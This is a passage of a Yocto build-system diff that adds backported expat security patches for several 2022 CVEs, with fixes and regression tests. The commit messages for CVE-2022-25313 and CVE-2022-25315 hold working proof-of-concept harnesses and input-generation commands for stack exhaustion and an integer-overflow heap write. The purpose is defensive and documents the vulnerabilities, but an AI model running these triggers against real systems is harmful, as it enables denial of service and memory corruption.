+   tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
+   tcase_add_test(tc_basic, test_bad_doctype);
++  tcase_add_test(tc_basic, test_bad_doctype_utf8);
+   tcase_add_test(tc_basic, test_bad_doctype_utf16);
+   tcase_add_test(tc_basic, test_bad_doctype_plus);
+   tcase_add_test(tc_basic, test_bad_doctype_star);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
+From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:19:13 +0100
+Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/561/commits
+
+CVE: CVE-2022-25236
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 902895d5..c768f856 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
+ 
+ XML_Parser XMLCALL
+ XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
+-  XML_Char tmp[2];
+-  *tmp = nsSep;
++  XML_Char tmp[2] = {nsSep, 0};
+   return XML_ParserCreate_MM(encodingName, NULL, tmp);
+ }
+ 
+@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
+      would be otherwise.
+   */
+   if (parser->m_ns) {
+-    XML_Char tmp[2];
+-    *tmp = parser->m_namespaceSeparator;
++    XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
+     parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
+   } else {
+     parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
+From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 01:09:29 +0100
+Subject: [PATCH] lib: Protect against malicious namespace declarations
+ (CVE-2022-25236)
+
+---
+ expat/lib/xmlparse.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c768f856..a3aef88c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+     if (! mustBeXML && isXMLNS
+         && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
+       isXMLNS = XML_FALSE;
++
++    // NOTE: While Expat does not validate namespace URIs against RFC 3986,
++    //       we have to at least make sure that the XML processor on top of
++    //       Expat (that is splitting tag names by namespace separator into
++    //       2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
++    //       by an attacker putting additional namespace separator characters
++    //       into namespace declarations.  That would be ambiguous and not to
++    //       be expected.
++    if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
++      return XML_ERROR_SYNTAX;
++    }
+   }
+   isXML = isXML && len == xmlLen;
+   isXMLNS = isXMLNS && len == xmlnsLen;
+From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:51:43 +0100
+Subject: [PATCH] tests: Cover CVE-2022-25236
+
+---
+ expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
+ 1 file changed, 30 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index d07203f2..bc5344b1 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
+ }
+ END_TEST
+ 
++START_TEST(test_ns_separator_in_uri) {
++  struct test_case {
++    enum XML_Status expectedStatus;
++    const char *doc;
++  };
++  struct test_case cases[] = {
++      {XML_STATUS_OK, "<doc xmlns='one_two' />"},
++      {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
++  };
++
++  size_t i = 0;
++  size_t failCount = 0;
++  for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++    XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
++    XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
++    if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
++                  /*isFinal*/ XML_TRUE)
++        != cases[i].expectedStatus) {
++      failCount++;
++    }
++    XML_ParserFree(parser);
++  }
++
++  if (failCount) {
++    fail("Namespace separator handling is broken");
++  }
++}
++END_TEST
++
+ /* Control variable; the number of times duff_allocator() will successfully
+  * allocate */
+ #define ALLOC_ALWAYS_SUCCEED (-1)
+@@ -11905,6 +11934,7 @@ make_suite(void) {
+   tcase_add_test(tc_namespace, test_ns_utf16_doctype);
+   tcase_add_test(tc_namespace, test_ns_invalid_doctype);
+   tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
++  tcase_add_test(tc_namespace, test_ns_separator_in_uri);
+ 
+   suite_add_tcase(s, tc_misc);
+   tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
+From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 19 Feb 2022 23:59:25 +0000
+Subject: [PATCH] Fix build_model regression.
+
+The iterative approach in build_model failed to fill children arrays
+correctly. A preorder traversal is not required and turned out to be the
+culprit. Use an easier algorithm:
+
+Add nodes from scaffold tree starting at index 0 (root) to the target
+array whenever children are encountered. This ensures that children
+are adjacent to each other. This complies with the recursive version.
+
+Store only the scaffold index in numchildren field to prevent a direct
+processing of these children, which would require a recursive solution.
+This allows the algorithm to iterate through the target array from start
+to end without jumping back and forth, converting on the fly.
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+---
+ lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
+ 1 file changed, 47 insertions(+), 32 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c479a258..84885b5a 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
+    *
+    * The iterative approach works as follows:
+    *
+-   * - We use space in the target array for building a temporary stack structure
+-   *   while that space is still unused.
+-   *   The stack grows from the array's end downwards and the "actual data"
+-   *   grows from the start upwards, sequentially.
+-   *   (Because stack grows downwards, pushing onto the stack is a decrement
+-   *   while popping off the stack is an increment.)
++   * - We have two writing pointers, both walking up the result array; one does
++   *   the work, the other creates "jobs" for its colleague to do, and leads
++   *   the way:
+    *
+-   * - A stack element appears as a regular XML_Content node on the outside,
+-   *   but only uses a single field -- numchildren -- to store the source
+-   *   tree node array index.  These are the breadcrumbs leading the way back
+-   *   during pre-order (node first) depth-first traversal.
++   *   - The faster one, pointer jobDest, always leads and writes "what job
++   *     to do" by the other, once they reach that place in the
++   *     array: leader "jobDest" stores the source node array index (relative
++   *     to array dtd->scaffold) in field "numchildren".
+    *
+-   * - The reason we know the stack will never grow into (or overlap with)
+-   *   the area with data of value at the start of the array is because
+-   *   the overall number of elements to process matches the size of the array,
+-   *   and the sum of fully processed nodes and yet-to-be processed nodes
+-   *   on the stack, cannot be more than the total number of nodes.
+-   *   It is possible for the top of the stack and the about-to-write node
+-   *   to meet, but that is safe because we get the source index out
+-   *   before doing any writes on that node.
++   *   - The slower one, pointer dest, looks at the value stored in the
++   *     "numchildren" field (which actually holds a source node array index
++   *     at that time) and puts the real data from dtd->scaffold in.
++   *
++   * - Before the loop starts, jobDest writes source array index 0
++   *   (where the root node is located) so that dest will have something to do
++   *   when it starts operation.
++   *
++   * - Whenever nodes with children are encountered, jobDest appends
++   *   them as new jobs, in order.  As a result, tree node siblings are
++   *   adjacent in the resulting array, for example:
++   *
++   *     [0] root, has two children
++   *       [1] first child of 0, has three children
++   *         [3] first child of 1, does not have children
++   *         [4] second child of 1, does not have children
++   *         [5] third child of 1, does not have children
++   *       [2] second child of 0, does not have children
++   *
++   *   Or (the same data) presented in flat array view:
++   *
++   *     [0] root, has two children
++   *
++   *     [1] first child of 0, has three children
++   *     [2] second child of 0, does not have children
++   *
++   *     [3] first child of 1, does not have children
++   *     [4] second child of 1, does not have children
++   *     [5] third child of 1, does not have children
++   *
++   * - The algorithm repeats until all target array indices have been processed.
+    */
+   XML_Content *dest = ret; /* tree node writing location, moves upwards */
+   XML_Content *const destLimit = &ret[dtd->scaffCount];
+-  XML_Content *const stackBottom = &ret[dtd->scaffCount];
+-  XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++  XML_Content *jobDest = ret; /* next free writing location in target array */
+   str = (XML_Char *)&ret[dtd->scaffCount];
+ 
+-  /* Push source tree root node index onto the stack */
+-  (--stackTop)->numchildren = 0;
++  /* Add the starting job, the root node (index 0) of the source tree  */
++  (jobDest++)->numchildren = 0;
+ 
+   for (; dest < destLimit; dest++) {
+-    /* Pop source tree node index off the stack */
+-    const int src_node = (int)(stackTop++)->numchildren;
++    /* Retrieve source tree array index from job storage */
++    const int src_node = (int)dest->numchildren;
+ 
+     /* Convert item */
+     dest->type = dtd->scaffold[src_node].type;
+@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
+       int cn;
+       dest->name = NULL;
+       dest->numchildren = dtd->scaffold[src_node].childcnt;
+-      dest->children = &dest[1];
++      dest->children = jobDest;
+ 
+-      /* Push children to the stack
+-       * in a way where the first child ends up at the top of the
+-       * (downwards growing) stack, in order to be processed first. */
+-      stackTop -= dest->numchildren;
++      /* Append scaffold indices of children to array */
+       for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+-           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+-        (stackTop + i)->numchildren = (unsigned int)cn;
+-      }
++           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
++        (jobDest++)->numchildren = (unsigned int)cn;
+     }
+   }
+ 
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
+From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:54:29 +0000
+Subject: [PATCH] Prevent stack exhaustion in build_model
+
+It is possible to trigger stack exhaustion in build_model function if
+depth of nested children in DTD element is large enough. This happens
+because build_node is a recursively called function within build_model.
+
+The code has been adjusted to run iteratively. It uses the already
+allocated heap space as temporary stack (growing from top to bottom).
+
+Output is identical to recursive version. No new fields in data
+structures were added, i.e. it keeps full API and ABI compatibility.
+Instead the numchildren variable is used to temporarily keep the
+index of items (uint vs int).
+
+Documentation and readability improvements kindly added by Sebastian.
+
+Proof of Concept:
+
+1. Compile poc binary which parses XML file line by line
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdio.h>
+
+ XML_Parser parser;
+
+ static void XMLCALL
+ dummy_element_decl_handler(void *userData, const XML_Char *name,
+                            XML_Content *model) {
+   XML_FreeContentModel(parser, model);
+ }
+
+ int main(int argc, char *argv[]) {
+   FILE *fp;
+   char *p = NULL;
+   size_t s = 0;
+   ssize_t l;
+   if (argc != 2)
+     errx(1, "usage: poc poc.xml");
+   if ((parser = XML_ParserCreate(NULL)) == NULL)
+     errx(1, "XML_ParserCreate");
+   XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
+   if ((fp = fopen(argv[1], "r")) == NULL)
+     err(1, "fopen");
+   while ((l = getline(&p, &s, fp)) > 0)
+     if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
+       errx(1, "XML_Parse");
+   XML_ParserFree(parser);
+   free(p);
+   fclose(fp);
+   return 0;
+ }
+EOF
+cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
+```
+
+2. Create XML file with a lot of nested groups in DTD element
+
+```
+cat > poc.xml.zst.b64 << EOF
+KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
+ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
+ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
+EOF
+base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
+```
+
+3. Run Proof of Concept
+
+```
+./poc poc.xml
+```
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
+
+CVE: CVE-2022-25313
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
+ 1 file changed, 79 insertions(+), 37 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..594cf12c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
+   return next;
+ }
+ 
+-static void
+-build_node(XML_Parser parser, int src_node, XML_Content *dest,
+-           XML_Content **contpos, XML_Char **strpos) {
+-  DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+-  dest->type = dtd->scaffold[src_node].type;
+-  dest->quant = dtd->scaffold[src_node].quant;
+-  if (dest->type == XML_CTYPE_NAME) {
+-    const XML_Char *src;
+-    dest->name = *strpos;
+-    src = dtd->scaffold[src_node].name;
+-    for (;;) {
+-      *(*strpos)++ = *src;
+-      if (! *src)
+-        break;
+-      src++;
+-    }
+-    dest->numchildren = 0;
+-    dest->children = NULL;
+-  } else {
+-    unsigned int i;
+-    int cn;
+-    dest->numchildren = dtd->scaffold[src_node].childcnt;
+-    dest->children = *contpos;
+-    *contpos += dest->numchildren;
+-    for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
+-         i++, cn = dtd->scaffold[cn].nextsib) {
+-      build_node(parser, cn, &(dest->children[i]), contpos, strpos);
+-    }
+-    dest->name = NULL;
+-  }
+-}
+-
+ static XML_Content *
+ build_model(XML_Parser parser) {
++  /* Function build_model transforms the existing parser->m_dtd->scaffold
++   * array of CONTENT_SCAFFOLD tree nodes into a new array of
++   * XML_Content tree nodes followed by a gapless list of zero-terminated
++   * strings. */
+   DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+   XML_Content *ret;
+-  XML_Content *cpos;
+-  XML_Char *str;
++  XML_Char *str; /* the current string writing location */
+ 
+   /* Detect and prevent integer overflow.
+    * The preprocessor guard addresses the "always false" warning
+@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
+   if (! ret)
+     return NULL;
+ 
+-  str = (XML_Char *)(&ret[dtd->scaffCount]);
+-  cpos = &ret[1];
++  /* What follows is an iterative implementation (of what was previously done
++   * recursively in a dedicated function called "build_node".  The old recursive
++   * build_node could be forced into stack exhaustion from input as small as a
++   * few megabyte, and so that was a security issue.  Hence, a function call
++   * stack is avoided now by resolving recursion.)
++   *
++   * The iterative approach works as follows:
++   *
++   * - We use space in the target array for building a temporary stack structure
++   *   while that space is still unused.
++   *   The stack grows from the array's end downwards and the "actual data"
++   *   grows from the start upwards, sequentially.
++   *   (Because stack grows downwards, pushing onto the stack is a decrement
++   *   while popping off the stack is an increment.)
++   *
++   * - A stack element appears as a regular XML_Content node on the outside,
++   *   but only uses a single field -- numchildren -- to store the source
++   *   tree node array index.  These are the breadcrumbs leading the way back
++   *   during pre-order (node first) depth-first traversal.
++   *
++   * - The reason we know the stack will never grow into (or overlap with)
++   *   the area with data of value at the start of the array is because
++   *   the overall number of elements to process matches the size of the array,
++   *   and the sum of fully processed nodes and yet-to-be processed nodes
++   *   on the stack, cannot be more than the total number of nodes.
++   *   It is possible for the top of the stack and the about-to-write node
++   *   to meet, but that is safe because we get the source index out
++   *   before doing any writes on that node.
++   */
++  XML_Content *dest = ret; /* tree node writing location, moves upwards */
++  XML_Content *const destLimit = &ret[dtd->scaffCount];
++  XML_Content *const stackBottom = &ret[dtd->scaffCount];
++  XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++  str = (XML_Char *)&ret[dtd->scaffCount];
++
++  /* Push source tree root node index onto the stack */
++  (--stackTop)->numchildren = 0;
++
++  for (; dest < destLimit; dest++) {
++    /* Pop source tree node index off the stack */
++    const int src_node = (int)(stackTop++)->numchildren;
++
++    /* Convert item */
++    dest->type = dtd->scaffold[src_node].type;
++    dest->quant = dtd->scaffold[src_node].quant;
++    if (dest->type == XML_CTYPE_NAME) {
++      const XML_Char *src;
++      dest->name = str;
++      src = dtd->scaffold[src_node].name;
++      for (;;) {
++        *str++ = *src;
++        if (! *src)
++          break;
++        src++;
++      }
++      dest->numchildren = 0;
++      dest->children = NULL;
++    } else {
++      unsigned int i;
++      int cn;
++      dest->name = NULL;
++      dest->numchildren = dtd->scaffold[src_node].childcnt;
++      dest->children = &dest[1];
++
++      /* Push children to the stack
++       * in a way where the first child ends up at the top of the
++       * (downwards growing) stack, in order to be processed first. */
++      stackTop -= dest->numchildren;
++      for (i = 0, cn = dtd->scaffold[src_node].firstchild;
++           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
++        (stackTop + i)->numchildren = (unsigned int)cn;
++      }
++    }
++  }
+ 
+-  build_node(parser, 0, ret, &cpos, &str);
+   return ret;
+ }
+ 
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+ 
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+-  int charsRequired = 0;
++  size_t charsRequired = 0;
+   XML_Char *result;
+ 
+   /* First determine how long the string is */
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
+From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:55:46 +0000
+Subject: [PATCH] Prevent integer overflow in storeRawNames
+
+It is possible to use an integer overflow in storeRawNames for out of
+boundary heap writes. Default configuration is affected. If compiled
+with XML_UNICODE then the attack does not work. Compiling with
+-fsanitize=address confirms the following proof of concept.
+
+The problem can be exploited by abusing the m_buffer expansion logic.
+Even though the initial size of m_buffer is a power of two, eventually
+it can end up a little bit lower, thus allowing allocations very close
+to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
+names can be parsed which are almost INT_MAX in size.
+
+Unfortunately (from an attacker point of view) INT_MAX/2 is also a
+limitation in string pools. Having a tag name of INT_MAX/2 characters
+or more is not possible.
+
+Expat can convert between different encodings. UTF-16 documents which
+contain only ASCII representable characters are twice as large as their
+ASCII encoded counter-parts.
+
+The proof of concept works by taking these three considerations into
+account:
+
+1. Move the m_buffer size slightly below a power of two by having a
+   short root node <a>. This allows the m_buffer to grow very close
+   to INT_MAX.
+2. The string pooling forbids tag names longer than or equal to
+   INT_MAX/2, so keep the attack tag name smaller than that.
+3. To be able to still overflow INT_MAX even though the name is
+   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
+   which only contains ASCII characters. UTF-16 always stores two
+   bytes per character while the tag name is converted to using only
+   one. Our attack node byte count must be a bit higher than
+   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
+   in sum can overflow INT_MAX.
+
+Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
+without running into INT_MAX boundary check. The string pooling is
+able to store INT_MAX/3 as tag name because the amount is below
+INT_MAX/2 limitation. And creating the sum of both eventually overflows
+in storeRawNames.
+
+Proof of Concept:
+
+1. Compile expat with -fsanitize=address.
+
+2. Create Proof of Concept binary which iterates through input
+   file 16 MB at once for better performance and easier integer
+   calculations:
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdlib.h>
+ #include <stdio.h>
+
+ #define CHUNK (16 * 1024 * 1024)
+ int main(int argc, char *argv[]) {
+   XML_Parser parser;
+   FILE *fp;
+   char *buf;
+   int i;
+
+   if (argc != 2)
+     errx(1, "usage: poc file.xml");
+   if ((parser = XML_ParserCreate(NULL)) == NULL)
+     errx(1, "failed to create expat parser");
+   if ((fp = fopen(argv[1], "r")) == NULL) {
+     XML_ParserFree(parser);
+     err(1, "failed to open file");
+   }
+   if ((buf = malloc(CHUNK)) == NULL) {
+     fclose(fp);
+     XML_ParserFree(parser);
+     err(1, "failed to allocate buffer");
+   }
+   i = 0;
+   while (fread(buf, CHUNK, 1, fp) == 1) {
+     printf("iteration %d: XML_Parse returns %d\n", ++i,
+       XML_Parse(parser, buf, CHUNK, XML_FALSE));
+   }
+   free(buf);
+   fclose(fp);
+   XML_ParserFree(parser);
+   return 0;
+ }
+EOF
+gcc -fsanitize=address -lexpat -o poc poc.c
+```
+
+3. Construct specially prepared UTF-16 XML file:
+
+```
+dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
+echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
+echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
+iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
+```
+
+4. Run proof of concept:
+
+```
+./poc poc-utf16.xml
+```
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
+
+CVE: CVE-2022-25315
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ lib/xmlparse.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..f34d6ab5 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
+   while (tag) {
+     int bufSize;
+     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
++    size_t rawNameLen;
+     char *rawNameBuf = tag->buf + nameLen;
+     /* Stop if already stored.  Since m_tagStack is a stack, we can stop
+        at the first entry that has already been copied; everything
+@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
+     /* For re-use purposes we need to ensure that the
+        size of tag->buf is a multiple of sizeof(XML_Char).
+     */
+-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++    /* Detect and prevent integer overflow. */
++    if (rawNameLen > (size_t)INT_MAX - nameLen)
++      return XML_FALSE;
++    bufSize = nameLen + (int)rawNameLen;
+     if (bufSize > tag->bufEnd - tag->buf) {
+       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
+       if (temp == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-40674.patch b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
new file mode 100644
index 0000000000..8b95f5f198
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
+From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
+From: Rhodri James <rhodri@wildebeest.org.uk>
+Date: Wed, 17 Aug 2022 18:26:18 +0100
+Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
+
+It is possible to concoct a situation in which parsing is
+suspended while substituting in an internal entity, so that
+XML_ResumeParser directly uses internalEntityProcessor as
+its processor.  If the subsequent parse includes some unclosed
+tags, this will return without calling storeRawNames to ensure
+that the raw versions of the tag names are stored in memory other
+than the parse buffer itself.  If the parse buffer is then changed
+or reallocated (for example if processing a file line by line),
+badness will ensue.
+
+This patch ensures storeRawNames is always called when needed
+after calling doContent.  The earlier call do doContent does
+not need the same protection; it only deals with entity
+substitution, which cannot leave unbalanced tags, and in any
+case the raw names will be pointing into the stored entity
+value not the parse buffer.
+
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
+CVE: CVE-2022-40674
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ expat/lib/xmlparse.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+Index: expat/lib/xmlparse.c
+===================================================================
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
+   {
+     parser->m_processor = contentProcessor;
+     /* see externalEntityContentProcessor vs contentProcessor */
+-    return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+-                     s, end, nextPtr,
+-                     (XML_Bool)! parser->m_parsingStatus.finalBuffer,
+-                     XML_ACCOUNT_DIRECT);
++    result = doContent(parser, parser->m_parentParser ? 1 : 0,
++                       parser->m_encoding, s, end, nextPtr,
++                       (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++                       XML_ACCOUNT_DIRECT);
++    if (result == XML_ERROR_NONE) {
++      if (! storeRawNames(parser))
++        return XML_ERROR_NO_MEMORY;
++    }
++    return result;
+   }
+ }
+ 
diff --git a/meta/recipes-core/expat/expat/CVE-2022-43680.patch b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
new file mode 100644
index 0000000000..6f93bc3ed7
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
+From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 20 Sep 2022 02:44:34 +0200
+Subject: [PATCH] lib: Fix overeager DTD destruction in
+ XML_ExternalEntityParserCreate
+
+CVE: CVE-2022-43680
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comments: Hunk refreshed
+---
+ lib/xmlparse.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index aacd6e7fc..57bf103cc 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
+   parserInit(parser, encodingName);
+ 
+   if (encodingName && ! parser->m_protocolEncodingName) {
++    if (dtd) {
++      // We need to stop the upcoming call to XML_ParserFree from happily
++      // destroying parser->m_dtd because the DTD is shared with the parent
++      // parser and the only guard that keeps XML_ParserFree from destroying
++      // parser->m_dtd is parser->m_isParamEntity but it will be set to
++      // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
++      parser->m_dtd = NULL;
++    }
+     XML_ParserFree(parser);
+     return NULL;
+   }
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
-From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001
-From: Khem Raj <raj.khem@gmail.com>
-Date: Thu, 2 Nov 2017 18:20:57 +0800
+From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
+From: Jasper Orschulko <jasper@fancydomain.eu>
